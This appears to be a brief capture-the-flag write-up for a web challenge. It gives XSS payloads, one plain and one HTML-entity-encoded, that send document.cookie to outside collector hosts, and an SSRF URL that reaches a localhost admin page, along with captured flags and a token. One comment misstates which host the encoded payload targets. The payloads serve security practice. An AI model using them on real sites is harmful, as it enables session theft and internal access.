# Methodology:
* Was not able to get the actual flag, but this should work
* Not sure why it wouldn't 
* '"><img src=x onerror="$.get('https://webhook.site/149ba98b-0073-440e-a756-552bafa26b7c?'+btoa(document.cookie))">
* Also tried this method: <img src=x onerror="&#0000106#0000097#0000118#0000097#0000115#0000099#0000114#0000105#0000112#0000116#0000058#0000100#0000111#0000099#0000117#0000109#0000101#0000110#0000116#0000046#0000108#0000111#0000099#0000097#0000116#0000105#0000111#0000110#0000061#0000039#0000104#0000116#0000116#0000112#0000115#0000058#0000047#0000047#0000119#0000101#0000098#0000104#0000111#0000111#0000107#0000046#0000115#0000105#0000116#0000101#0000047#0000049#0000052#0000057#0000098#0000097#0000057#0000056#0000098#0000045#0000048#0000048#0000055#0000051#0000045#0000052#0000052#0000048#0000101#0000045#0000097#0000055#0000053#0000054#0000045#0000053#0000053#0000050#0000098#0000097#0000102#0000097#0000050#0000054#0000098#0000055#0000099#0000063#0000039#0000043#0000100#0000111#0000099#0000117#0000109#0000101#0000110#0000116#0000046#0000099#0000111#0000111#0000107#0000105#0000101#0000059">
* "javascript:document.location='https://postb.in/b/1591988477067-4363618670031/?cookie='+document.cookie;" this statement is encoded above
* flag: CTF{3mbr4c3_the_c00k1e_w0r1d_ord3r}
* auth: TUtb9PPA9cYkfcVQWYzxy4XbtyL3VNKz
* the auth gives us the admin link
* to get the next flag, we do an ssrf attack
* there is a link to a video that makes a request to the server from the server; we replace that request with a request to localhost as shown below
* full link: http://cwo-xss.web.ctfcompetition.com/watch?livestream=http://cwo-xss.web.ctfcompetition.com@127.0.0.1/admin/controls
* flag: CTF{WhatIsThisCookieFriendSpaceBookPlusAllAccessRedPremiumThingLooksYummy}
